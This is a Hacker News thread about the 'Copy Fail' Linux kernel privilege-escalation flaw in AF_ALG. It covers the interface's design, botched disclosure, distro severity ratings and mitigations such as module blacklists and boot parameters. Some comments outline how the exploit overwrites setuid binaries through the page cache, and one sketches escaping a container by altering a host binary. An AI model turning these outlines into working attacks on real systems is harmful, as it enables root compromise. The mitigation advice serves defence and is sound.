As someone who works on the Linux kernel's cryptography code, the regularly occurring AF_ALG exploits are really frustrating. AF_ALG, which was added to the kernel many years ago without sufficient review, should not exist. It's very complex, and it exposes a massive attack surface to unprivileged userspace programs. And it's almost completely unnecessary, as userspace already has its own cryptography code to use. The kernel's cryptography code is just for in-kernel users (for example, dm-crypt).<p>The algorithm being used in this exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API.<p>If you're in charge of the configuration for a Linux kernel, I strongly recommend disabling all CONFIG_CRYPTO_USER_API_* kconfig options. This would have made this bug, and also every past and future AF_ALG bug, unexploitable. In the unlikely event that you find that it breaks any userspace programs on your system, please help migrate them to userspace crypto code! For some it's already been done. But in general, AF_ALG has actually never been used much in the first place, other than in exploits.<p>I don't think there's much other option. This sort of userspace API might have been <i>sort of</i> okay many years ago. But it just doesn't stand up in a world with syzbot, LLM-assisted bug discovery, etc.
As I did not know what AF_ALG is in the first place I've searched for it and found this here:<p><a href="https://www.chronox.de/libkcapi/html/ch01s02.html" rel="nofollow">https://www.chronox.de/libkcapi/html/ch01s02.html</a><p>It states the following:<p>> There are several reasons for AF_ALG:<p>> * The first and most important item is the access to hardware accelerators and hardware devices whose technical interface can only be accessed from the kernel mode / supervisor state of the processor. Such support cannot be used from user space except through AF_ALG.<p>> * When using user space libraries, all key material and other cryptographic sensitive parameters remains in the calling application's memory even when the application supplied the information to the library. When using AF_ALG, the key material and other sensitive parameters are handed to the kernel. The calling application now can reliably erase that information from its memory and just use the cipher handle to perform the cryptographic operations. If the application is cracked an attacker cannot obtain the key material.<p>> * On memory constrained systems like embedded systems, the additional memory footprint of a user space cryptographic library may be too much. As the kernel requires the kernel crypto API to be present, reusing existing code should reduce the memory footprint.<p>I can't judge whether this is a good justification, but there is one.
AF_ALG if I remember correctly predates userspace-accessible crypto acceleration and was way more important back when it meant you had actual need for "SSL accelerator" cards in servers, among other things
Hi, embedded firmware engineer here. I give it a B-<p>There's a weird area between the workloads that fit on a microcontroller, and the stuff that demands a full-blown CPU. Think softcore processors on FPGAs, super tiny MIPS and RISC-V cores on an ASIC, etc. Typically you run something like Yocto on a core like that. Maybe MontaVista or QNX if you've got the right nerd running the show.<p>So you have serious compute needs, and security concerns that justify virtual memory. But you <i>don't</i> have infinite space to work with, so hardware acceleration is important. Having a standard API built into the kernel seems like a decent idea I guess.<p>And yet, I've never heard of AF_ALG. I've never seen it used. The thing is, if you have some bizzaro softcore, there's a good chance you also have a bizzaro crypto engine with no upstream kernel driver. If you're going to the trouble of rolling your own kernel with drivers for special crypto engines, why would you bother hooking it into this thing? Roll your own API that fits your needs and doesn't have a gigantic attack surface.
You should take note that this is written by the person that wrote the bad patch.<p>So grain of salt.
I've said I'm not sure about the validity of that reasoning.<p>I've liked it nevertheless for context, as augmentation to parent's post.
I feel like it should be possible to fulfill these advantages with a minimal, not very complex API. I.e. the grandparent's comment about IPsec implementation details doesn't make the cut, but a hardware accelerated cipher implementation does.
But is it true or not? Whoever wrote it. (for objective truth the subjects are unimportant)
It might have been true in 2002 but it hasn't been true since at least about 2010.<p>You've almost certainly never had a system that supported any hardware accelerated crypto that also required a kernel module.<p>It's much easier to expose as cpu extensions.
When you can’t know the objective truth or when there isn’t one (as is the case in making decisions about security tradeoffs in software design), knowing the source of the argument is vital to interpreting its validity.
Please don't rely on my judgement for this being safe for production, but
after blacklisting the modules, the provided python exploit failed.<p>Check if the following are modules<p><pre><code> grep CONFIG_CRYPTO_USER_API /boot/config-$(uname -r)
</code></pre>
If they are, you can try blacklisting them<p><pre><code> /etc/modprobe.d/blacklist-crypto-user-api.conf
"""
blacklist af_alg
blacklist algif_hash
blacklist algif_skcipher
blacklist algif_rng
blacklist algif_aead
install af_alg /bin/false
install algif_hash /bin/false
install algif_skcipher /bin/false
install algif_rng /bin/false
install algif_aead /bin/false
"""
update-initramfs -u
</code></pre>
Can anyone comment on the ramifications this?
If iwd, or cryptsetup with certain non-default algorithms, isn't being used on the system, you should be fine. Not many programs use AF_ALG. It's possible there are others I'm not aware of, but it's quite rare.<p>To be clear, general-purpose Linux distros generally can't disable these kconfig options yet, due to these cases. But there are many Linux systems that simply don't need this functionality.<p>A good project for someone to work on would be to fix iwd and cryptsetup to always use userspace crypto, as they should.
Or<p><pre><code> zgrep CONFIG_CRYPTO_USER_API /proc/config.gz</code></pre>
I can’t comment on the ramifications, except to note that elsewhere in the thread this appears to not break anything (whether it makes userspace crypto a little less safe is academic, but that doesn’t matter if we have an easy local root shell), but I can verify the above fix does protect Ubuntu 24.04 from the exploit.<p>Just reboot after applying this change.
Is it built as a module in most distros?
For anyone wondering: AF_ALG is a Linux socket interface that exposes the kernel’s crypto API via file descriptors, using normal read(2)/write(2) calls for hashing and encryption.
I love this. I think everyone in software should be feeling a tinge of “we should trim the fat” right now - get rid of as much of the old and infrequently used/tested code as we can. Push users towards the better tested alternatives.
It does enable address space separation of secret keys from user space, which some people love:<p><a href="https://blog.cloudflare.com/the-linux-kernel-key-retention-service-and-why-you-should-use-it-in-your-next-application/" rel="nofollow">https://blog.cloudflare.com/the-linux-kernel-key-retention-s...</a><p><a href="https://www.youtube.com/watch?v=7djRRjxaCKk" rel="nofollow">https://www.youtube.com/watch?v=7djRRjxaCKk</a><p><a href="https://www.youtube.com/watch?v=lvZaDE578yc" rel="nofollow">https://www.youtube.com/watch?v=lvZaDE578yc</a><p>So it's not as simple as "should not exist". I agree though that there doesn't seem to be a valid need to expose authencesn to user space.<p>Disclosure: I'm co-maintaining crypto/asymmetric_keys/ in the kernel and the author/presenter in the first two links is another co-maintainer.
That can be done in userspace too -- different userspace processes have different address spaces too.<p>The fact that the first link recommends using keyctl() for RSA private keys is also "interesting", given that the kernel's implementation of RSA isn't hardened against timing attacks (but userspace implementations of RSA typically are).
The CloudFlare blog discusses that idea when they talk about having an "agent process" to hold cryptographic material, but they list drawbacks like having to develop two processes, implement a well-defined interface, and enforce ACLs. I'm not convinced that "developing two processes" is a reason not to do it, since the kernel is effectively just the second process now, but everything else makes sense.<p>It's unfortunate though since this is one thing I think Windows does decently well. The Windows crypto and TLS APIs do use a key isolation process by default (LSASS) and have a stable interface for other processes to use it [0]. I imagine systemd could implement something similar, but I also know that there are very strong opinions about adding more surface area to systemd.<p>[0] <a href="https://blackhat.com/docs/us-16/materials/us-16-Kambic-Cunning-With-CNG-Soliciting-Secrets-From-SChannel.pdf" rel="nofollow">https://blackhat.com/docs/us-16/materials/us-16-Kambic-Cunni...</a>
> the kernel's implementation of RSA isn't hardened against timing attacks<p>Cloudflare is using custom BoringSSL-based crypto code in the kernel:<p><a href="https://lore.kernel.org/all/CALrw=nEyTeP=6QcdEvaeMLZEq_pYB9WO=vFt2K2FuJ1TEmP1Lg@mail.gmail.com/" rel="nofollow">https://lore.kernel.org/all/CALrw=nEyTeP=6QcdEvaeMLZEq_pYB9W...</a>
can you please give me a real-life example of an application, on a typical linux laptop or typical linux server, which userspace application would use this CRYPTO_USER_API ? None that I looked at seem to use it: openssl, pgp, sha256sum
As Eric has correctly stated above, we believe iwd (Intel Wireless Daemon), or rather the ell library it relies on (Embedded Linux Library) is the only relatively widespread user space application relying on it.
Isn't the better argument to ask whether there'd be benefit if all those things did?<p>A lack of adoption isn't apriori a good argument against an interface, and serious bugs can happen anywhere.<p>My personal opinion for a while has been that crypto operations <i>should</i> be in the kernel so we can end the madness that is every application shipping it's own crypto and trust system which has only gotten worse since containers were invented.
> My personal opinion for a while has been that crypto operations should be in the kernel so we can end the madness that is every application shipping it's own crypto and trust system which has only gotten worse since containers were invented.<p>There’s a valid argument here but I think that’d devolve into the DNSSec trap without both a very well-designed API and a stable way to ship updates for older kernels. If people can’t get good user experience or have to force kernel upgrades to improve security, most applications will avoid it. Things like Chrome shipping their own crypto mean that they can very quickly ship things like PQC without waiting years or having to deal with issues like kernel n+1 having unrelated driver or performance issues which force things into a security vs. functionality fight.
Which does sort of loop around to the issue of Linux not having a stable ABI as a feature I suppose which would be one way to implement it with long term compatibility on kernel modules.<p>But the Chrome example also highlights the problem: Chrome might ship it, but vanishingly little software is ever going to upgrade and we've got an explosion of statically linked languages now.
> A lack of adoption isn't apriori a good argument against an interface<p>I mean it kind of is (perhaps not a priori, but why is that relavent?). If something is not being used, its not meeting needs, so its just increasing attack surfaces without benefit.
I was completely unaware of <a href="https://syzbot.org" rel="nofollow">https://syzbot.org</a>, thanks for sharing!<p>> syzbot system continuously fuzzes main Linux kernel branches and automatically reports found bugs to kernel mailing lists. syzbot dashboard shows current statuses of bugs. All syzbot-reported bugs are also CCed to syzkaller-bugs mailing list. Direct all questions to syzkaller@googlegroups.com.
The primary benefit of AF_ALG is IMHO when it's combined with kernel keyrings, i.e. ALG_SET_KEY_BY_KEY_SERIAL.<p>To steal from the sibling post:<p>> * When using user space libraries, all key material and other cryptographic sensitive parameters remains in the calling application's memory even when the application supplied the information to the library. When using AF_ALG, the key material and other sensitive parameters are handed to the kernel. The calling application now can reliably erase that information [...]<p>It's even more than this: you can do crypto ops in user space <i>without ever even having the key to begin with</i>.<p>[Ed.: that said, maybe AF_ALG should be locked behind some CAP_*]<p>[Ed.#2: that said^2, I'm putting this one on authencesn, not AF_ALG. It's the extended sequence number juggling that went poorly, not AF_ALG at large. I bet this might even blow up in some strange hardware scenarios, "network packet on PCIe memory" or something like that - I'm speculating, though.]
It doesn't seem to actually get used that way in practice. ALG_SET_KEY_BY_KEY_SERIAL didn't even appear until just a few years ago. And either way, if the interface allows you to overwrite the su binary, whether it theoretically could provide some other security benefit becomes kind of irrelevant.
It is being used that way:<p><a href="https://github.com/opensourcerouting/frr/blob/2b48e4f97fb02133f3a09db067dc8249ed41e968/lib/keyctl.c#L593" rel="nofollow">https://github.com/opensourcerouting/frr/blob/2b48e4f97fb021...</a><p>And, sure, if it breaks system security it's pointless. But so did "dirty pipe".<p>I do agree the number of issues in AF_ALG is annoying, which is why I suggested a CAP_* restriction. Maybe CAP_SYS_ADMIN in init_ns, that's kinda the big hammer.
Better implemented as another user space process than in the kernel.
I think it would be reasonable to deprecate af_alg in favor of a character device. It's more accessible that way. The downside is that the maintainers hate adding new ioctls. I think that's fair. But I don't think a "regular" device node would cover the functionality userland expects.<p>That said, elsewhere ITT it's pointed out there are only a few use cases so far.
Why is this available in the kernel on a box that does not use ipsec? should this be compile time enabled module instead than a generic solution?
The design philosophy of mainstream Linux distros is not like OpenBSD.<p>Linux distros go to market as maximally capable, maximally interoperable, and maximally available for whatever the users want to do. So there is a lot of "shovelware" that is unnecessarily installed with your base system. A lot of services are enabled that you don't need. A lot of kernel modules are loaded or ready to spring into action as soon as you connect hardware that the kernel recognizes.<p>All this maximizing also increases the system's attack surface, whether local or over the network. Your resources, time and effort increase, to update the system and maintain all those packages. The TCO is high.<p>With OpenBSD, the base system is hardened and the code is audited with security in mind. They only install or enable essential functions. So it's up to the user to dig in, customize it, and add in features that are needed.<p>The good news is that you can do some after-market hardening. Uninstall software that you're not using, and disable non-essential services. Tune your kernel for special-purpose, or general-purpose, but not every-purpose.<p>There are now special distros for containers and VMs with minimal system builds. They are designed to be as small and lightweight as possible. That is a good start in the right direction.
How did it get in? Isn’t Linus known for being rightfully fussy about what makes it into the kernel?<p>Would be an interesting story.
Removing this will make the friendly spooks at NSA very sad....
No, it'd make <i>me</i> sad. If they're lurking in there and we can do without, I'm happy to always have my own .config<p>If this gets removed, they'll creep in somewhere we can't find them for a while.
iwd requires CONFIG_CRYPTO_USER_API_AEAD, so disabling this would break Wi-Fi for a lot of people.
Many things, such as ksmbd seems ill-advised when looked at from security. New AI driven exploits
era will likely make projects more wary to adding functions.
YAGNI stocks are rising, Gentoo devs that compile their own kernel probably yeeted this module. Alpine, and MUSL deviants are probably immune to this downswing.<p>DRY looking very bearish, do repeat yourself, do build your own, do use userspace tools even if the kernel has its own version. Not as big a hit on the DRY philosophy as those pip and npm supply chain attacks last couple of weeks though.<p>KISS remains unaffected for the time being.
can you please give me a real-life example of an application, on a typical linux laptop or typical linux server, which userspace application would use this CRYPTO_USER_API ? None that I looked at seem to use it: openssl, pgp, sha256sum
any idea what software this will break once I turn this kernel configuration off?
iwd is the main culprit (for systems that use it instead of wpa_supplicant).<p>I think cryptsetup / LUKS also requires it with some non-default options. With the default options, it works fine with the kconfigs disabled.<p>There's not much else, as far as I know. Normally programs just use a userspace library instead, such as OpenSSL.
What other kernel modules would you suggest disabling that aren't used usually?
It seems there was some kind of confusion during the disclosure process, because the vendors aren't treating this vulnerability as serious and it remains unpatched in many distros.<p><a href="https://access.redhat.com/security/cve/cve-2026-31431" rel="nofollow">https://access.redhat.com/security/cve/cve-2026-31431</a> "Moderate severity", "Fix deferred"<p><a href="https://security-tracker.debian.org/tracker/CVE-2026-31431" rel="nofollow">https://security-tracker.debian.org/tracker/CVE-2026-31431</a><p><a href="https://ubuntu.com/security/CVE-2026-31431" rel="nofollow">https://ubuntu.com/security/CVE-2026-31431</a><p><a href="https://www.suse.com/security/cve/CVE-2026-31431.html" rel="nofollow">https://www.suse.com/security/cve/CVE-2026-31431.html</a>
Seems like distros consider it a medium risk because it doesn't involve remote code execution and requires local access. Though it allows local root privilege escalation which is considered high priority.<p><a href="https://ubuntu.com/security/cves/about#priority" rel="nofollow">https://ubuntu.com/security/cves/about#priority</a><p>> Medium: A significant problem, typically exploitable for many users. Includes network daemon denial of service, cross-site scripting, and gaining user privileges.
Strange that it's not classified as "high", which specifically includes "local root privilege escalations".<p>> High: A significant problem, typically exploitable for nearly all users in a default installation of Ubuntu. Includes serious remote denial of service, local root privilege escalations, local data theft, and data loss.
if your model is that linux is just about single-user desktops, this local exploit isn't too bad. or if your model is nothing but DB servers or the like.<p>mystifying to me that shared, multi-user machines are not thought of. for instance, I administer a system with 27k users - people who can login. even if only 1/10,000 of them are curious/malicious/compromised, we (Canadian national research HPC systems) are at risk. yes, this is somewhat uncommon these days, when shell access is not the norm.<p>but consider the very common sort of shared hosting environment: they typically provide something like plesk to interface to shared machines with no particular isolation. can you (as a website owner or 0wner) convince wordpress/etc to drop and execute a script? yep.
Ubuntu is not really targeting multi-user any more. Security update installation is deliberately delayed for all users, until at some point all unprivileged users ended all processes launched from the vulnerable snap image. (Firefox RPC breaks when you replace the binary, so having to reopen your browser to keep opening tabs simple because security upgrades were applied in the background would be inconvenient)
> if your model is that linux is just about single-user desktops, this local exploit isn't too bad.<p>For example, if you have passwordless sudo, you've already got a widely known LPE vulnerability lurking on your system.
Only for your user, and it means a keylogger on the system if it gets rooted can't pull your password to try on other machines. Personally I always either login as root or use passwordless sudo.
Yubikeys are also surprisingly annoying when setup for the as well. A working developer just needs sudo a lot.<p>Realistically a "sudo button" would be handy, on the keyboard, with a display to show a confirmation pin for the request (probably also needs a deny button so you can try and identify weird ones).
Sounds like a good use case for that new Copilot button you see on newer keyboards.
You don't even need a button. Just a secure dialog like Windows has.
I mean, that's what you have pinentry for.
hmm have i missed anything?
Not to bad? So we just threat linux overall as a single user system or what?
Local access is a bit of a misnomer though, a vulnerable website can be tricked into running a script
Ubuntu seems to have updated the page to say that it's a high priority now.
it's not like this couldn't be chained with some other exploit to get remote access to get remote root access which seems like a bit of an issue
As far as we can tell, nobody disclosed it to the distributions, only to the kernel security team (who did not reach out to distributions). So the distributions are all scrambling now.<p>Good lesson in how not to do disclosure.
It was already known to attackers (or basically anyone watching) weeks ago when the patch hit the kernel but it wasn't communicated by upstream as a vuln (because Linus and Greg do not believe that vulnerabilities are conceptually relevant to the kernel).
Yeah, it was also staged for release on the affected kernel branches a while ago, but almost all still had the window open and only tonight got the merged across all maintained kernel versions.<p>It's not good... and surely not "responsible/planned" disclosure.
RedHat has also changed it to "Important severity" and "Affected" now.
I'm schocked that ubuntu is aware of this and the prv lts is not patched yet :|<p>wtf
I thought that. surely people are going crazy right now owning anything with an our of date Wordpress exposed.
Yeah, by ubuntu's own guidelines linked on that page, this should be priority: high, but instead it's marked as medium.
The upstream stable kernels (6.12.85, etc.) are out now with the fixes.
It's unfortunate that this does not include which versions of the kernel are vulnerable/patched, especially since this is a builtin module which cannot be easily removed with rmmod...<p>I was wondering if I was vulnerable running Fedora 44, kernel 6.19.14, and after a few minutes of digging I was able to find the linux-cve-announce mailing list post: <a href="https://lore.kernel.org/linux-cve-announce/2026042214-CVE-2026-31431-3d65@gregkh/T/#u" rel="nofollow">https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20...</a> which says:<p><pre><code> ...fixed in 6.18.22 with commit fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8
...fixed in 6.19.12 with commit ce42ee423e58dffa5ec03524054c9d8bfd4f6237
...fixed in 7.0 with commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
</code></pre>
Hope that helps.
Thanks for this - I was wondering why I got the password prompt on my Fedora 43 with latest packages.
most distros backport fixes which does not increment that version number. i.e. they patch it, they do not ship a completely new kernel release.
Greg KH says more backports coming soon.<p><a href="https://openwall.com/lists/oss-security/2026/04/30/12" rel="nofollow">https://openwall.com/lists/oss-security/2026/04/30/12</a>
This submission is currently the main HN submission.<p>As of now the submission title is simply “Copy Fail”.<p>Given the severity of the exploit, can we edit the Title to add some context that it’s a major Linux vulnerability?<p>Eg the other submissions say this :
“Copy Fail: 732 Bytes to Root on Every Major Linux Distribution.”
I dont really get why you'd<p>- buy a domain<p>- vibe code a page/artifact/whatever (which, given the quality of LLM wordings, only makes an argument less strong)<p>- post it on HN with no further explanation in the title<p>Why not write a detailed report? Even a tweet makes much more sense in my head than this. Even a logo??<p>Sorry if this comes over as salty, I guess I'm just not getting the thought process.
> I dont really get why you'd buy a domain [...] Even a tweet makes much more sense in my head than this<p>I think we should be celebrating people hosting their own content on their own website instead of just posting on some social media site.
I think they’re using it to promote their product, Xint Code, which was used to discover it. That’s the way I read it anyway.
Maybe it’s tradition <a href="https://news.ycombinator.com/item?id=7548991">https://news.ycombinator.com/item?id=7548991</a>
Where would you have them write a detailed report if not a website?
The domain is canonical.<p>Then it's syndicate everywhere.<p>But all roads lead back to the domain.
Definitely comes over as salty. Naming major flaws has been a tradition for decades. Remember Heartbleed? It had a site and a logo :) Shellshock, Meltdown, Spectre as well. A few more: <a href="https://github.com/hannob/vulns" rel="nofollow">https://github.com/hannob/vulns</a><p>This site though is pretty useful; first it serves as a central location to point people to with short links in chats/emails/whatever, then it has a quick visual explainer <i>and</i> a link to the detailed technical report for those who want more info. Pretty neat.<p>Last but not least, buying the domain must have taken 5 minutes, prompting the page must have taken 30 minutes and posting it on HN must have taken 1 minute. So it certainly wasn't a lot of work in the grand scheme of things and probably did not deter the team from doing other important things.
It used to be done for fame and visibility. Give a marketable name and a website, your exploit will be talked about and your name will shine in the industry.<p>Now it's done by an LLM to sell more LLMs services. Disclosure is botched to have the most sensational title so more click more upsell.
[dead]
Yes, strongly agree.<p>This is HUGE news, I would have skimmed over "Copy Fail".<p>The blog post might be a better place to link to also, it has more details on the exploit.<p><a href="https://xint.io/blog/copy-fail-linux-distributions" rel="nofollow">https://xint.io/blog/copy-fail-linux-distributions</a><p>There are also some good threads on which distros are vulnerable and mitigations on the github page.<p><a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/issues" rel="nofollow">https://github.com/theori-io/copy-fail-CVE-2026-31431/issues</a>
If you want to use the suggested mitigation (disabling kernel module `algif_aead` with a modprobe config), and you do not want to run that whole obfuscated shell code to get an actual root shell, but only check if the module can be loaded, here is a readable version of its first few lines:<p><pre><code> python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind(("aead","authencesn(hmac(sha256),cbc(aes))")); print("algif_aead probably successfully loaded, mitigation not effective; remove again with: rmmod algif_aead")'
</code></pre>
Similarly, when the mitigation is in place,<p><pre><code> modprobe algif_aead
</code></pre>
should fail with an error.
LPE = local privilege escalation<p>Too many darn acronyms. This one wasn't too hard to figure out from context but I wish people would define acronyms before using them!
LPE is a very well-known acronym within the security community, it's not purely academic or obscure or anything.<p>I agree that it would be a good idea to define it explicitly when writing for a broader audience, but I don't think it's particularly egregious that they didn't. It's certainly something I could see myself forgetting.<p>Then again, the whole writeup appears to be AI-generated, so...
It is nowhere near this. There are very few acronyms in the IT world that are actually well-known outside of it. LPE is less well-known than LVAD or MCU.<p><a href="https://www.acronymfinder.com/Information-Technology/MCU.html" rel="nofollow">https://www.acronymfinder.com/Information-Technology/MCU.htm...</a><p><a href="https://www.acronymfinder.com/LVAD.html" rel="nofollow">https://www.acronymfinder.com/LVAD.html</a><p><a href="https://www.acronymfinder.com/Information-Technology/LPE.html" rel="nofollow">https://www.acronymfinder.com/Information-Technology/LPE.htm...</a>
Sure, but the target audience of copy.fail is surely not the security community but regular sysadmins who probably don't otherwise follow as closely.
Good writing for a broad audience requires it. Unfortunately the LLMs don't tend to adopt this guideline.
To be fair, I just consulted 3 cybersecurity glossaries (SANS.org, NIST CSRC, Huntress), and none of them list "LPE" nor "Local Privilege Escalation".<p>If you type "LPE" into English Wikipedia's search bar, and press "Enter", you'll be sent to a disambiguation page which contains a link to the relevant article.<p><a href="https://en.wikipedia.org/wiki/LPE" rel="nofollow">https://en.wikipedia.org/wiki/LPE</a>
I don't know why, but newer writers have never been taught to expand their acronyms on first use. I blame the US education system.
Good thing nobody is silly enough to let fully autonomous AI agents run as regular users on these affected operating systems. That could be disastrous given a zero day prompt injection technique.
I don't see what the issue is, my agent is already running as root.
Good thing we haven't normalized installing things with curl | sh
Yeah, that's great!<p>Imagine we would download random code from the internet and just execute it, like with NPM, PIP, Maven, Cargo etc.
I don’t think that matters as it’s usually curl | sudo sh
Or npm being allowed to run arbitrary post install scripts
I literally ship an installer that runs with curl | bash... reading this thread while patching my servers is a fun experience lol
[dead]
That is why we should get rid of setuid binaries. GrapheneOS does not use them and was therefore not affected. On the desktop there is also a project called Secureblue based on Fedora Atomic that is moving in a similar direction and has already eliminated a large number though not all setuid binaries. As an alternative to sudo, su, and pkexec there is for example run0, which is available in distributions using systemd. Since systemd 259 there is now also the --empower parameter which like sudo elevates the privileges of the regular user. Essentially any distribution could start removing sudo and create an alias so that users don’t have to adjust immediately.
No, it is not affected by the exploit as presented. This is a page cache write, so writing to a binary that root will run later can work too. This isn’t a reason to push an agenda that dislikes setuid binaries.
The page itself seems vibecoded and a bit of an advertisement, but it does look like the vulnerability is real and high risk. It does explain the big security update I just got, guess I'll prioritize updating today.
This is pretty obviously an advertisement but it's a pretty good advertisement imo, it pairs a meaningful contribution to the OSS ecosystem (discovering and patching a real bug) with selling your cybersecurity tool at the same time.
With vibe coding, html is a visualiation tool. not sure if i get your problem with that?
These guys don't need to advertise, they are already 100% busy with work. But who wastes their time manually creating web pages? Especially kernel devs.
Side comment: I have recently used Claude Code to make a few sites for testing purposes. In the prompt I added "don't make it look vibe coded," and it worked pretty well: No purple gradients, bento box layouts, etc. Nothing spectacularly original, either, but probably enough to avoid accusations of vibe coding.
it's advertising their AI, not the talents of their humans :D
I wasn't able to unload algif_aead on RHEL 9/10 because it's built in, rather than a module.<p>So here the next-best thing I found: Disable AF_ALG via systemd. Needs drop-ins for all exposed services. Here an Ansible playbook that covers ssdh and user@, which are the main ones usually.<p><a href="https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464da" rel="nofollow">https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464d...</a>
How about blacklisting algif_aead initialization function on RHEL 9/10? I added "initcall_blacklist=algif_aead_init" to the kernel boot options and rebooted. The exploit is not working anymore.
FYI RHEL's SELinux policy blocks AF_ALG socket creation for confined services out of the box. But disabling via RestrictAddressFamilies= unit option, or initcall_blacklist= kernel parameter, seems to be a good mitigation for unconfined services, users and containers.
I was coming up with the same intuition. However, it's like a whack-a-mole. What about cronjobs and slurmjobs and other services? Is there a way to do this directly on systemd so that all other processes inherit it rather than doing it on each one?
So this replaces a SUID binary, in order to run as PID 0. The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container (or specifically, a user namespace).<p>I ran the exploit in rootless Podman, and predictably it doesn't escape the container.<p>They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine
><i>The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container </i><p>they state that the write-up is forthcoming. presumably there is some additional steps or modifications that will be detailed in the 'part 2'.<p><i>"Next: "From Pod to Host," how Copy Fail escapes every major cloud Kubernetes platform."</i>
It overwrites bytes in memory of any file you can read. It's not hard to imagine how it could escape a lot of things.
The 2017 claim is based on the vulnerability having been introduced in this commit in the second half of 2017: <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=72548b093ee3" rel="nofollow">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...</a><p>The details will depend on whether the kernel is a newer release or a maintenance version of an older release.
> They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine<p>They've done themselves no favours at all with their write up.<p>It does seem legitimate (I was able to use the PoC on a 24.04 instance), and seems like it should be a big deal, but the actual number of affected distributions seems way lower, and not even remotely as per their claim every distribution since 2017.<p>For example with Ubuntu, if I'm reading it right there's some impact in 16.04 (EOL), but then at least as per their analysis, only the vendor specific 6.17 kernels they ship that have it (e.g. linux-gcp, linux-oracle-6.7 etc.). That's a relatively new kernel version they started shipping recently, after it was released upstream last September.
If you can get to real UID 0 from a rootless container, you can escape it, but you do need to take extra steps. Same with it working on Alpine: the underlying vulnerability probably still exists, but the script might need some adjusting. It's a PoC, not a full exploit for every situation.
It's worth pointing out that you cannot, definitionally, get "real UID 0" in a "rootless" container, because then it wouldn't be a rootless container. This is relevant because this exploit doesn't claim to be able to bypass user namespaces, and that getting "real UID 0" would be a different exploit.
The underlying exploit allows writing arbitrary values to the page cache, independent of any namespacing, so it should be assumed to allow container escapes even if the given PoC code doesn't do that.
That's fair (although it doesn't have anything to do with getting "real root" in a userns in that case). I guess one approach would be something like modifying the host's logrotate binary and waiting for it to trigger, or something like that. Would escape the container to root on the host directly. I imagine it wouldn't be a sure thing to pull off, either, but definitely straightforward enough that any APT should be asking Claude to develop it.
Their PoC does as you say, but is built upon arbitrary modification of the page cache, which could be abused for the other things
Kubernetes 1.33 switches to user namespaces enabled by default, which I imagine is the same underlying mechanism that rootless Podman uses. `hostUsers: false` is the way to ensure that root in the pod is root on the host. It's trivial for a real (unmapped) root to escape a Kubernetes pod.
Did you try it on systems that don't have the patch already? Seems many distributions already shipped kernels with the patch ~a month ago.
It also doesn't work on Raspberry Pi, though presumably it could easily be made to; it does replace the su binary, but the replacement is not executable.
It's patching the binary in memory, so the binary patch would be architecture dependent. The existing one is only x86_64, but with an updated payload, it would work on arm.
this is because the `su` binary is replaced with x86 shellcode, replace it with aarch64 and it will work just the same.
there is a PoC floating around for Alpine.
[flagged]
For mitigation, the page currently basically just says:<p>> Update your distribution's kernel package to one that includes mainline commit a664bf3d603d<p>But it isn't very clear to me what Kernel version you can expect that to be in. For Arch/CachyOS, the patch seems to be included in 6.18.22+, 6.19.12+ and 7.0+. If you're on any of the lower versions in the same upstream stable series, you're likely vulnerable right now. Some distro kernels may include the fix in other versions, so check for your distribution.
On a git repo that has as remotes<p><pre><code> https://github.com/torvalds/linux.git
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git as remotes:
</code></pre>
running a search for commit a664bf3d603d's commit message:<p><pre><code> git log --all --grep 'crypto: algif_aead - Revert to operating out-of-place' '--format=%H' | xargs -I '{}' git tag --contains '{}' | sort -u
</code></pre>
outputs these tags as having the fix:<p><pre><code> v6.18.22
v6.18.23
v6.18.24
v6.18.25
v6.19.12
v6.19.13
v6.19.14
v7.0
v7.0.1
v7.0.2
v7.0-rc7
v7.1-rc1</code></pre>
Here's the diff if you wanna play in your source (Gentoo, looking at you):<p><a href="https://github.com/torvalds/linux/commit/a664bf3d603d" rel="nofollow">https://github.com/torvalds/linux/commit/a664bf3d603d</a><p>6.18.25-gentoo-x86_64 has the patch for Gentoo.
distros might also apply patches to their own packages, so this isn't a perfect signal (i.e. if you have one of those versions, you almost certainly have the fix, but if you don't, it might still be fixed but you'll need to check the distro's package information to know for sure).
Major os vendors will publish pages with the fixed versions:<p><a href="https://security-tracker.debian.org/tracker/CVE-2026-31431" rel="nofollow">https://security-tracker.debian.org/tracker/CVE-2026-31431</a><p><a href="https://ubuntu.com/security/CVE-2026-31431" rel="nofollow">https://ubuntu.com/security/CVE-2026-31431</a><p>Also, disabling algif_aead is suggested as mitigation
Note that in kubernetes, setting `allowPrivilegeEscalation` to false (which you should be doing already, it's in the Pod Security Standards Restricted profile) mitigates this.
according to this reddit post <a href="https://www.reddit.com/r/kubernetes/comments/1szn6p1/comment/oj4cs67/" rel="nofollow">https://www.reddit.com/r/kubernetes/comments/1szn6p1/comment...</a>?<p>> the primary mitigation is still patching the node kernel; user namespaces are blast-radius reduction, not a complete mitigation for this path
They have a setting for that?<p>That's crazy, feels like prompting "make no mistakes" to the llm.<p>If it works, when would you want it turned on? Why isn't false the default
Because it would break all setuid binaries? Same reason the Linux kernel doesn't set no_new_privs (<a href="https://docs.kernel.org/userspace-api/no_new_privs.html" rel="nofollow">https://docs.kernel.org/userspace-api/no_new_privs.html</a>) by default.<p>As an operator you are responsible for configuring your environment correctly. I would recommend starting here: <a href="https://kubernetes.io/docs/concepts/security/" rel="nofollow">https://kubernetes.io/docs/concepts/security/</a>
It's equivalent to setting no_new_privs on the container process, so it'd mean you have to grant a privelege to the container process if you want any children to have access to it. It sure sounds funny in a CVE context, though.
